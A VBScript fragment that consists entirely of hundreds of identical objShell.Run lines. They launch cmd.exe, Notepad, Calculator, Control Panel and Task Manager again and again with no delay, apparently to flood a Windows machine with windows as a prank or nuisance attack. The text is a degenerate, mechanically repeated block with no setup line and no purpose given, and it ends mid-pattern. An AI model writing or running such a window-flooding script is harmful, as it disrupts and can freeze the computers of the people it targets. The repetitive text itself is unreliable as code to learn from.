objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
